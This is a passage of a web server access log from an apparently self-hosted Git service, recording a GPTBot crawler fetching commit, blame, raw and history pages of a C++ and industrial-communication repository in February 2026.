3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11428] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11424] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode" -[17/Feb/2026:17:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12006] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode" -[17/Feb/2026:17:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12006] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" -[17/Feb/2026:17:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode" -[17/Feb/2026:17:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11978] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode" -[17/Feb/2026:17:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 63006] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" -[17/Feb/2026:17:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" -[17/Feb/2026:17:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176816] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" -[17/Feb/2026:17:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176815] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" -[17/Feb/2026:17:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" -[17/Feb/2026:17:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56432] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" -[17/Feb/2026:17:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11281] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11280] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11255] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11279] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11280] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23941] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" -[17/Feb/2026:17:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176813] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" -[17/Feb/2026:17:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:17:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 169504] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" -[17/Feb/2026:17:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23945] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" -[17/Feb/2026:17:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56429] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" -[17/Feb/2026:17:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176810] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" -[17/Feb/2026:17:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll?display=rendered" [Client 74.7.227.38] [Length 10852] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:17:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23942] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" -[17/Feb/2026:17:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176818] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" -[17/Feb/2026:17:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2ftransport_error.hpp" [Client 74.7.227.38] [Length 18549] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2ftransport_state.hpp" [Client 74.7.227.38] [Length 23136] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2ftransport_error.hpp" [Client 74.7.227.38] [Length 24961] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=name&state=closed" [Client 74.7.227.38] [Length 8510] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:17:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10097] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:17:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11489] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11187] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13301] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 